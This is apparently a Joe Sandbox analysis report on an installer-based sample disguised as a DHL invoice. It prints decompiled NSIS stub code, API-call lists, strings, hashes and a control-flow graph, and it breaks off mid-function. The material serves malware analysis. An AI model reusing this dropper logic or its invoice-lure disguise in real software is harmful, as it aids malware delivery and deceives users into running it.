                                                                            				_t152 = CharNextW(E004065F6( ==  ?  &M00440002 : L"\"C:\\Users\\Arthur\\Desktop\\DHL_INVOICE.exe\"", ( !=  ? _t140 : _t165) & 0x0000ffff));
                                                                            				_v1048 = _t152;
                                                                            				_t71 =  *_t152 & 0x0000ffff;
                                                                            				if(_t71 == 0) {
                                                                            					L40:
                                                                            					_t141 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                            					GetTempPathW(0x400, _t141);
                                                                            					__eflags = E00403CA5(_t152, __eflags);
                                                                            					if(__eflags != 0) {
                                                                            						L43:
                                                                            						DeleteFileW(L"1033"); // executed
                                                                            						_t161 = E004033ED(__eflags, _t175);
                                                                            						_t176 = 0;
                                                                            						__eflags = _t161;
                                                                            						if(_t161 != 0) {
                                                                            							L71:
                                                                            							_t143 = _v1028;
                                                                            							L72:
                                                                            							E004036D2();
                                                                            							__imp__OleUninitialize();
                                                                            							__eflags = _t161;
                                                                            							if(_t161 == 0) {
                                                                            								__eflags =  *0x435ad4;
                                                                            								if( *0x435ad4 == 0) {
                                                                            									L82:
                                                                            									__eflags =  *0x435aec - 0xffffffff;
                                                                            									ExitProcess(_t143);
                                                                            									L74:
                                                                            								}
                                                                            								_t79 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v1024);
                                                                            								__eflags = _t79;
                                                                            								if(_t79 != 0) {
                                                                            									LookupPrivilegeValueW(_t176, L"SeShutdownPrivilege",  &(_v1016.Privileges));
                                                                            									_v1016.PrivilegeCount = 1;
                                                                            									_v1004 = 2;
                                                                            									AdjustTokenPrivileges(_v1024, _t176,  &_v1016, _t176, _t176, _t176);
                                                                            								}
                                                                            								_t80 = E004068E6(4);
                                                                            								__eflags = _t80;
                                                                            								if(_t80 == 0) {
                                                                            									L80:
                                                                            									_t81 = ExitWindowsEx(2, 0x80040002);
                                                                            									__eflags = _t81;
                                                                            									if(_t81 != 0) {
                                                                            										goto L82;
                                                                            									}
                                                                            									goto L81;
                                                                            								} else {
                                                                            									_t83 =  *_t80(_t176, _t176, _t176, 0x25, 0x80040002);
                                                                            									__eflags = _t83;
                                                                            									if(_t83 == 0) {
                                                                            										L81:
                                                                            										E00401533(9);
                                                                            										goto L82;
                                                                            									}
                                                                            									goto L80;
                                                                            								}
                                                                            							}
                                                                            							E00406AA8(_t161, 0x200010);
                                                                            							ExitProcess(2);
                                                                            							goto L74;
                                                                            						}
                                                                            						__eflags =  *0x435a04;
                                                                            						if( *0x435a04 == 0) {
                                                                            							L53:
                                                                            							 *0x435aec =  *0x435aec | 0xffffffff;
                                                                            							_t143 = E00405A3E();
                                                                            							goto L72;
                                                                            						}
                                                                            						_t168 = E004065F6(L"\"C:\\Users\\Arthur\\Desktop\\DHL_INVOICE.exe\"", 0);
                                                                            						_t91 = L"\"C:\\Users\\Arthur\\Desktop\\DHL_INVOICE.exe\"";
                                                                            						while(1) {
                                                                            							__eflags = _t168 - _t91;
                                                                            							if(_t168 < _t91) {
                                                                            								break;
                                                                            							}
                                                                            							__eflags =  *_t168 - 0x5f0020;
                                                                            							if( *_t168 != 0x5f0020) {
                                                                            								L48:
                                                                            								_t168 = _t168 - 2;
                                                                            								__eflags = _t168;
                                                                            								continue;
                                                                            							}
                                                                            							__eflags =  *((intOrPtr*)(_t168 + 4)) - 0x3d003f;
                                                                            							if( *((intOrPtr*)(_t168 + 4)) == 0x3d003f) {
                                                                            								break;
                                                                            							}
                                                                            							goto L48;
                                                                            						}
                                                                            						_t161 = L"Error launching installer";
                                                                            						__eflags = _t168 - _t91;
                                                                            						if(__eflags < 0) {
                                                                            							_t169 = E004064FC();
                                                                            							lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L"~nsu");
                                                                            							__eflags = _t169;
                                                                            							if(_t169 != 0) {
                                                                            								lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", "A");
                                                                            							}
                                                                            							lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L".tmp");
                                                                            							_t95 = lstrcmpiW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L"C:\\Users\\Arthur\\Desktop");
                                                                            							__eflags = _t95;
                                                                            							if(_t95 == 0) {
                                                                            								L69:
                                                                            								_t143 = _t176;
                                                                            								goto L72;
                                                                            							} else {
                                                                            								_push(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
                                                                            								__eflags = _t169;
                                                                            								if(_t169 == 0) {
                                                                            									E00405E1E();
                                                                            								} else {
                                                                            									E00405E3E();
                                                                            								}
                                                                            								SetCurrentDirectoryW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
                                                                            								__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring" - _t176; // 0x43
                                                                            								if(__eflags == 0) {
                                                                            									E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", L"C:\\Users\\Arthur\\Desktop");
                                                                            								}
                                                                            								E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", _v1024);
                                                                            								L"74420235" = 0x41;
                                                                            								_t170 = 0x1a;
                                                                            								do {
                                                                            									_push( *((intOrPtr*)( *0x435a10 + 0x120)));
                                                                            									_push(0x42b538);
                                                                            									E00405EBA();
                                                                            									DeleteFileW(0x42b538);
                                                                            									__eflags = _t161;
                                                                            									if(_t161 != 0) {
                                                                            										_t103 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\DHL_INVOICE.exe", 0x42b538, 1);
                                                                            										__eflags = _t103;
                                                                            										if(_t103 != 0) {
                                                                            											E0040623D(0x42b538, _t176);
                                                                            											_push( *((intOrPtr*)( *0x435a10 + 0x124)));
                                                                            											_push(0x42b538);
                                                                            											E00405EBA();
                                                                            											_t107 = E004066D6(0x42b538);
                                                                            											__eflags = _t107;
                                                                            											if(_t107 != 0) {
                                                                            												CloseHandle(_t107);
                                                                            												_t161 = _t176;
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            									L"74420235" =  &(L"74420235"[0]);
                                                                            									_t170 = _t170 - 1;
                                                                            									__eflags = _t170;
                                                                            								} while (_t170 != 0);
                                                                            								E0040623D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", _t176);
                                                                            								goto L69;
                                                                            							}
                                                                            						}
                                                                            						 *_t168 = 0;
                                                                            						_t171 = _t168 + 8;
                                                                            						_t113 = E00406638(__eflags, _t168 + 8);
                                                                            						__eflags = _t113;
                                                                            						if(_t113 == 0) {
                                                                            							goto L69;
                                                                            						}
                                                                            						E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", _t171);
                                                                            						E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Forcible", _t171);
                                                                            						_t161 = _t176;
                                                                            						goto L53;
                                                                            					}
                                                                            					GetWindowsDirectoryW(_t141, 0x3fb);
                                                                            					lstrcatW(_t141, L"\\Temp");
                                                                            					__eflags = E00403CA5(_t152, __eflags);
                                                                            					if(__eflags != 0) {
                                                                            						goto L43;
                                                                            					}
                                                                            					GetTempPathW(0x3fc, _t141);
                                                                            					lstrcatW(_t141, L"Low");
                                                                            					SetEnvironmentVariableW(L"TEMP", _t141);
                                                                            					SetEnvironmentVariableW(L"TMP", _t141);
                                                                            					__eflags = E00403CA5(_t152, __eflags);
                                                                            					if(__eflags == 0) {
                                                                            						_t176 = 0;
                                                                            						__eflags = 0;
                                                                            						goto L71;
                                                                            					}
                                                                            					goto L43;
                                                                            				} else {
                                                                            					_t173 = _t71;
                                                                            					while(1) {
                                                                            						_t124 = _t173 & 0x0000ffff;
                                                                            						if(_t173 != _t140) {
                                                                            							goto L21;
                                                                            						} else {
                                                                            							goto L20;
                                                                            						}
                                                                            						do {
                                                                            							L20:
                                                                            							_t152 =  &(_t152[1]);
                                                                            							_t124 =  *_t152 & 0x0000ffff;
                                                                            						} while (_t124 == _t140);
                                                                            						L21:
                                                                            						_t158 = _t124 & 0x0000ffff;
                                                                            						if(_t124 == _v1020) {
                                                                            							_t158 = _t152[1] & 0x0000ffff;
                                                                            							_t131 = 0x22;
                                                                            							_t140 = _t131;
                                                                            						}
                                                                            						_t25 =  &(_t152[1]); // 0x0
                                                                            						_t126 =  !=  ? _t152 : _t25;
                                                                            						if(_t158 != 0x2f) {
                                                                            							L35:
                                                                            							_t152 = E004065F6(_t126, _t140);
                                                                            							_t144 = 0x22;
                                                                            							_t128 =  *_t152 & 0x0000ffff;
                                                                            							_t159 = _t128;
                                                                            							if(_t128 == _t144) {
                                                                            								_t152 =  &(_t152[1]);
                                                                            								_t159 =  *_t152 & 0x0000ffff;
                                                                            							}
                                                                            							_t173 = _t159 & 0x0000ffff;
                                                                            							if(_t159 == 0) {
                                                                            								goto L40;
                                                                            							} else {
                                                                            								_t140 = 0x20;
                                                                            								continue;
                                                                            							}
                                                                            						} else {
                                                                            							_t126 = _t126 + 2;
                                                                            							_t153 = 0x53;
                                                                            							_t160 = 0x20;
                                                                            							if( *_t126 == _t153) {
                                                                            								_t155 =  *(_t126 + 2) & 0x0000ffff;
                                                                            								if(_t155 == _t160 || _t155 == 0) {
                                                                            									 *0x435ae0 = 1;
                                                                            								}
                                                                            							}
                                                                            							if( *_t126 == 0x43004e &&  *(_t126 + 4) == 0x430052) {
                                                                            								_t154 =  *(_t126 + 8) & 0x0000ffff;
                                                                            								if(_t154 == _t160 || _t154 == 0) {
                                                                            									_t175 = _t175 | 0x00000004;
                                                                            								}
                                                                            							}
                                                                            							if( *((intOrPtr*)(_t126 - 4)) != 0x2f0020 ||  *_t126 != 0x3d0044) {
                                                                            								goto L35;
                                                                            							} else {
                                                                            								_t152 = 0;
                                                                            								 *((short*)(_t126 - 4)) = 0;
                                                                            								__eflags = _t126 + 4;
                                                                            								E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", _t126 + 4);
                                                                            								goto L40;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            			}























































                                                                            0x00403708
                                                                            0x00403712
                                                                            0x00403716
                                                                            0x00403718
                                                                            0x00403728
                                                                            0x0040372b
                                                                            0x00403730
                                                                            0x00403739
                                                                            0x00403745
                                                                            0x0040377e
                                                                            0x00403747
                                                                            0x0040374b
                                                                            0x00403754
                                                                            0x00403758
                                                                            0x00403759
                                                                            0x0040375b
                                                                            0x00403767
                                                                            0x0040377a
                                                                            0x00403769
                                                                            0x0040376d
                                                                            0x0040376d
                                                                            0x00403770
                                                                            0x00403770
                                                                            0x0040378a
                                                                            0x00403797
                                                                            0x0040378c
                                                                            0x0040378c
                                                                            0x00403791
                                                                            0x00403791
                                                                            0x0040379b
                                                                            0x004037ca
                                                                            0x004037d1
                                                                            0x004037dd
                                                                            0x004037e0
                                                                            0x004037e7
                                                                            0x004037ee
                                                                            0x004037ee
                                                                            0x004037e7
                                                                            0x004037f0
                                                                            0x004037f5
                                                                            0x004037f6
                                                                            0x00403803
                                                                            0x00403805
                                                                            0x0040380b
                                                                            0x00403819
                                                                            0x0040381e
                                                                            0x00403825
                                                                            0x00403829
                                                                            0x0040382d
                                                                            0x0040382f
                                                                            0x0040382f
                                                                            0x0040382d
                                                                            0x00403836
                                                                            0x0040383d
                                                                            0x00403849
                                                                            0x0040385c
                                                                            0x0040386c
                                                                            0x0040387d
                                                                            0x00403890
                                                                            0x00403893
                                                                            0x00403897
                                                                            0x004038a3
                                                                            0x004038a7
                                                                            0x004038aa
                                                                            0x004038b3
                                                                            0x004038c3
                                                                            0x004038c5
                                                                            0x004038c9
                                                                            0x004038cf
                                                                            0x004039aa
                                                                            0x004039b0
                                                                            0x004039bb
                                                                            0x004039c2
                                                                            0x004039c4
                                                                            0x00403a1c
                                                                            0x00403a27
                                                                            0x00403a2f
                                                                            0x00403a31
                                                                            0x00403a33
                                                                            0x00403a35
                                                                            0x00403be6
                                                                            0x00403be6
                                                                            0x00403bea
                                                                            0x00403bea
                                                                            0x00403bef
                                                                            0x00403bf5
                                                                            0x00403bf7
                                                                            0x00403c0c
                                                                            0x00403c13
                                                                            0x00403c91
                                                                            0x00403c91
                                                                            0x00403c06
                                                                            0x00403c06
                                                                            0x00403c06
                                                                            0x00403c23
                                                                            0x00403c29
                                                                            0x00403c2b
                                                                            0x00403c38
                                                                            0x00403c45
                                                                            0x00403c53
                                                                            0x00403c5b
                                                                            0x00403c5b
                                                                            0x00403c63
                                                                            0x00403c6d
                                                                            0x00403c6f
                                                                            0x00403c7d
                                                                            0x00403c80
                                                                            0x00403c86
                                                                            0x00403c88
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403c71
                                                                            0x00403c77
                                                                            0x00403c79
                                                                            0x00403c7b
                                                                            0x00403c8a
                                                                            0x00403c8c
                                                                            0x00000000
                                                                            0x00403c8c
                                                                            0x00000000
                                                                            0x00403c7b
                                                                            0x00403c6f
                                                                            0x00403bff
                                                                            0x00403c06
                                                                            0x00000000
                                                                            0x00403c06
                                                                            0x00403a3b
                                                                            0x00403a41
                                                                            0x00403aa6
                                                                            0x00403aa6
                                                                            0x00403ab2
                                                                            0x00000000
                                                                            0x00403ab2
                                                                            0x00403a4e
                                                                            0x00403a50
                                                                            0x00403a6b
                                                                            0x00403a6b
                                                                            0x00403a6d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403a57
                                                                            0x00403a5d
                                                                            0x00403a68
                                                                            0x00403a68
                                                                            0x00403a68
                                                                            0x00000000
                                                                            0x00403a68
                                                                            0x00403a5f
                                                                            0x00403a66
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403a66
                                                                            0x00403a6f
                                                                            0x00403a74
                                                                            0x00403a76
                                                                            0x00403ac8
                                                                            0x00403aca
                                                                            0x00403acf
                                                                            0x00403ad1
                                                                            0x00403add
                                                                            0x00403add
                                                                            0x00403aec
                                                                            0x00403afb
                                                                            0x00403b01
                                                                            0x00403b03
                                                                            0x00403be0
                                                                            0x00403be0
                                                                            0x00000000
                                                                            0x00403b09
                                                                            0x00403b09
                                                                            0x00403b0e
                                                                            0x00403b10
                                                                            0x00403b19
                                                                            0x00403b12
                                                                            0x00403b12
                                                                            0x00403b12
                                                                            0x00403b23
                                                                            0x00403b29
                                                                            0x00403b30
                                                                            0x00403b3c
                                                                            0x00403b3c
                                                                            0x00403b4a
                                                                            0x00403b51
                                                                            0x00403b5b
                                                                            0x00403b5c
                                                                            0x00403b61
                                                                            0x00403b67
                                                                            0x00403b6c
                                                                            0x00403b76
                                                                            0x00403b78
                                                                            0x00403b7a
                                                                            0x00403b88
                                                                            0x00403b8e
                                                                            0x00403b90
                                                                            0x00403b98
                                                                            0x00403ba2
                                                                            0x00403ba8
                                                                            0x00403bad
                                                                            0x00403bb7
                                                                            0x00403bbc
                                                                            0x00403bbe
                                                                            0x00403bc1
                                                                            0x00403bc7
                                                                            0x00403bc7
                                                                            0x00403bbe
                                                                            0x00403b90
                                                                            0x00403bc9
                                                                            0x00403bd0
                                                                            0x00403bd0
                                                                            0x00403bd0
                                                                            0x00403bdb
                                                                            0x00000000
                                                                            0x00403bdb
                                                                            0x00403b03
                                                                            0x00403a7a
                                                                            0x00403a7d
                                                                            0x00403a81
                                                                            0x00403a86
                                                                            0x00403a88
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403a94
                                                                            0x00403a9f
                                                                            0x00403aa4
                                                                            0x00000000
                                                                            0x00403aa4
                                                                            0x004039cc
                                                                            0x004039d8
                                                                            0x004039e2
                                                                            0x004039e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004039ec
                                                                            0x004039f4
                                                                            0x00403a05
                                                                            0x00403a0d
                                                                            0x00403a14
                                                                            0x00403a16
                                                                            0x00403be4
                                                                            0x00403be4
                                                                            0x00000000
                                                                            0x00403be4
                                                                            0x00000000
                                                                            0x004038d5
                                                                            0x004038d5
                                                                            0x004038d7
                                                                            0x004038d7
                                                                            0x004038dd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004038df
                                                                            0x004038df
                                                                            0x004038df
                                                                            0x004038e2
                                                                            0x004038e5
                                                                            0x004038ea
                                                                            0x004038ed
                                                                            0x004038f5
                                                                            0x004038f7
                                                                            0x004038fd
                                                                            0x004038fe
                                                                            0x004038fe
                                                                            0x00403905
                                                                            0x00403908
                                                                            0x0040390f
                                                                            0x0040396a
                                                                            0x00403971
                                                                            0x00403975
                                                                            0x00403976
                                                                            0x00403979
                                                                            0x0040397e
                                                                            0x00403980
                                                                            0x00403983
                                                                            0x00403983
                                                                            0x00403986
                                                                            0x0040398c
                                                                            0x00000000
                                                                            0x0040398e
                                                                            0x00403990
                                                                            0x00000000
                                                                            0x00403990
                                                                            0x00403911
                                                                            0x00403913
                                                                            0x00403916
                                                                            0x00403919
                                                                            0x0040391d
                                                                            0x0040391f
                                                                            0x00403926
                                                                            0x0040392d
                                                                            0x0040392d
                                                                            0x00403926
                                                                            0x0040393d
                                                                            0x00403948
                                                                            0x0040394f
                                                                            0x00403956
                                                                            0x00403956
                                                                            0x0040394f
                                                                            0x00403960
                                                                            0x00000000
                                                                            0x00403996
                                                                            0x00403996
                                                                            0x00403998
                                                                            0x0040399c
                                                                            0x004039a5
                                                                            0x00000000
                                                                            0x004039a5
                                                                            0x00403960
                                                                            0x0040390f
                                                                            0x004038d7

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403718
                                                                            • GetVersionExW.KERNEL32 ref: 00403741
                                                                            • GetVersionExW.KERNEL32(?), ref: 00403754
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037FC
                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403836
                                                                            • OleInitialize.OLE32(00000000), ref: 0040383D
                                                                            • SHGetFileInfoW.SHELL32(004095B0,00000000,?,000002B4,00000000), ref: 0040385C
                                                                            • GetCommandLineW.KERNEL32(00434A00,NSIS Error), ref: 00403871
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL_INVOICE.exe",?,"C:\Users\user\Desktop\DHL_INVOICE.exe",00000000), ref: 004038BD
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004039BB
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039CC
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039D8
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039EC
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039F4
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403A05
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403A0D
                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403A27
                                                                              • Part of subcall function 004033ED: GetTickCount.KERNEL32 ref: 00403400
                                                                              • Part of subcall function 004033ED: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_INVOICE.exe,00000400,?,?,?,?,?), ref: 0040341C
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403ACA
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409600), ref: 00403ADD
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403AEC
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_INVOICE.exe",00000000,00000000), ref: 00403AFB
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B23
                                                                            • DeleteFileW.KERNEL32(0042B538,0042B538,?,user32::EnumWindows(i r1 ,i 0),?), ref: 00403B76
                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL_INVOICE.exe,0042B538,00000001), ref: 00403B88
                                                                            • CloseHandle.KERNEL32(00000000,0042B538,0042B538,?,0042B538,00000000), ref: 00403BC1
                                                                              • Part of subcall function 00405E1E: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00405E26
                                                                              • Part of subcall function 00405E1E: GetLastError.KERNEL32 ref: 00405E30
                                                                            • OleUninitialize.OLE32(00000000), ref: 00403BEF
                                                                            • ExitProcess.KERNEL32 ref: 00403C06
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403C1C
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403C23
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C38
                                                                            • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C5B
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C80
                                                                              • Part of subcall function 004065F6: CharNextW.USER32(?,004038BC,"C:\Users\user\Desktop\DHL_INVOICE.exe",?,"C:\Users\user\Desktop\DHL_INVOICE.exe",00000000), ref: 0040660C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                            • String ID: "C:\Users\user\Desktop\DHL_INVOICE.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mnstring$C:\Users\user\AppData\Local\Temp\mnstring\Forcible$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_INVOICE.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu
                                                                            • API String ID: 1152188737-694302570
                                                                            • Opcode ID: a525dd75b22903d4bd79fbaf6cc3fb9b74ee5543d4fcd6c254fdcda9163020fa
                                                                            • Instruction ID: bd20618887128fe8ff831b6fc98b417d690d9367272f1fc6873584cad7b34aa2
                                                                            • Opcode Fuzzy Hash: a525dd75b22903d4bd79fbaf6cc3fb9b74ee5543d4fcd6c254fdcda9163020fa
                                                                            • Instruction Fuzzy Hash: 00D134B12043116AE7207F659C46B2B3AACAB4474EF41453FF586B62D2D7BC9D40CB2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 146 404b30-404b47 147 404cd9-404cdf 146->147 148 404b4d-404c1b GetDlgItem * 3 call 405503 call 405835 GetClientRect GetSystemMetrics SendMessageW * 2 146->148 150 404ce1-404d07 GetDlgItem CreateThread CloseHandle 147->150 151 404d25-404d2b 147->151 169 404c31-404c37 148->169 170 404c1d-404c2f SendMessageW * 2 148->170 153 404d0d-404d16 call 40575b 150->153 154 404d56-404d5c 151->154 155 404d2d-404d37 151->155 162 404d1b-404d22 153->162 159 404da4-404da7 154->159 160 404d5e-404d65 154->160 155->153 158 404d39-404d54 ShowWindow * 2 call 405503 155->158 158->153 159->153 163 404dad-404db1 159->163 165 404d67-404d71 160->165 166 404d7a-404d8f ShowWindow 160->166 163->153 171 404db7-404dcf SendMessageW 163->171 173 404d73-404d78 call 405958 165->173 167 404da0-404da2 166->167 168 404d91-404d9b call 405d3a 166->168 167->173 168->167 175 404c43-404c5c call 40551a 169->175 176 404c39-404c41 SendMessageW 169->176 170->169 177 404ee5-404ee7 171->177 178 404dd5-404e07 CreatePopupMenu call 405eba AppendMenuW 171->178 173->153 185 404c90-404cb6 GetDlgItem SendMessageW 175->185 186 404c5e-404c72 ShowWindow 175->186 176->175 177->162 187 404e09-404e19 GetWindowRect 178->187 188 404e1d-404e39 TrackPopupMenu 178->188 185->177 189 404cbc-404cd4 SendMessageW * 2 185->189 190 404c74-404c7d ShowWindow 186->190 191 404c7f 186->191 187->188 188->177 192 404e3f-404e4b 188->192 189->177 193 404c85-404c8b call 405503 190->193 191->193 194 404e53-404e6d SendMessageW 192->194 193->185 194->194 196 404e6f-404e99 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 194->196 197 404e9b-404ec7 SendMessageW 196->197 197->197 198 404ec9-404edf GlobalUnlock SetClipboardData CloseClipboard 197->198 198->177
                                                                            C-Code - Quality: 85%
                                                                            			E00404B30() {
                                                                            				struct HMENU__* _t63;
                                                                            				WCHAR* _t64;
                                                                            				int _t68;
                                                                            				void* _t76;
                                                                            				signed int _t78;
                                                                            				short _t79;
                                                                            				short _t80;
                                                                            				int _t82;
                                                                            				void* _t97;
                                                                            				intOrPtr _t100;
                                                                            				long _t114;
                                                                            				struct HWND__* _t128;
                                                                            				struct HWND__* _t130;
                                                                            				struct HWND__* _t131;
                                                                            				unsigned int _t132;
                                                                            				int _t135;
                                                                            				long _t136;
                                                                            				int _t138;
                                                                            				signed int _t140;
                                                                            				short* _t141;
                                                                            				int _t144;
                                                                            				int _t148;
                                                                            				void* _t149;
                                                                            				long _t150;
                                                                            				void* _t151;
                                                                            				long _t152;
                                                                            				void* _t153;
                                                                            
                                                                            				_t128 =  *0x4349e8;
                                                                            				_t136 =  *(_t153 + 0x64);
                                                                            				if(_t136 != 0x110) {
                                                                            					if(_t136 != 0x405) {
                                                                            						if(_t136 != 0x111) {
                                                                            							if(_t136 != 0x404) {
                                                                            								if(_t136 != 0x7b ||  *(_t153 + 0x68) != _t128) {
                                                                            									L14:
                                                                            									return E0040575B(_t136,  *(_t153 + 0x6c),  *(_t153 + 0x6c));
                                                                            								} else {
                                                                            									_t144 = 0;
                                                                            									_t148 = SendMessageW(_t128, 0x1004, 0, 0);
                                                                            									 *(_t153 + 0x64) = _t148;
                                                                            									if(_t148 <= 0) {
                                                                            										L37:
                                                                            										return 0;
                                                                            									}
                                                                            									_t63 = CreatePopupMenu();
                                                                            									_push(0xffffffe1);
                                                                            									_push(0);
                                                                            									 *(_t153 + 0x70) = _t63;
                                                                            									_t64 = E00405EBA();
                                                                            									_t138 = 1;
                                                                            									AppendMenuW( *(_t153 + 0x74), 0, 1, _t64);
                                                                            									_t132 =  *(_t153 + 0x6c);
                                                                            									_t135 = _t132;
                                                                            									_t68 = _t132 >> 0x10;
                                                                            									if(_t132 == 0xffffffff) {
                                                                            										GetWindowRect(_t128, _t153 + 0x10);
                                                                            										_t135 =  *(_t153 + 0x10);
                                                                            										_t68 =  *(_t153 + 0x14);
                                                                            									}
                                                                            									if(TrackPopupMenu( *(_t153 + 0x80), 0x180, _t135, _t68, _t144,  *(_t153 + 0x64), _t144) == _t138) {
                                                                            										 *(_t153 + 0x28) = _t144;
                                                                            										 *(_t153 + 0x34) = 0x42bd48;
                                                                            										 *((intOrPtr*)(_t153 + 0x38)) = 0x1000;
                                                                            										do {
                                                                            											_t148 = _t148 - 1;
                                                                            											_t138 = _t138 + 2 + SendMessageW(_t128, 0x1073, _t148, _t153 + 0x20);
                                                                            										} while (_t148 != 0);
                                                                            										OpenClipboard(_t144);
                                                                            										EmptyClipboard();
                                                                            										_t149 = GlobalAlloc(0x42, _t138 + _t138);
                                                                            										 *(_t153 + 0x64) = _t149;
                                                                            										_t76 = GlobalLock(_t149);
                                                                            										_t150 =  *(_t153 + 0x64);
                                                                            										_t140 = _t76;
                                                                            										do {
                                                                            											 *(_t153 + 0x34) = _t140;
                                                                            											_t78 = SendMessageW(_t128, 0x1073, _t144, _t153 + 0x20);
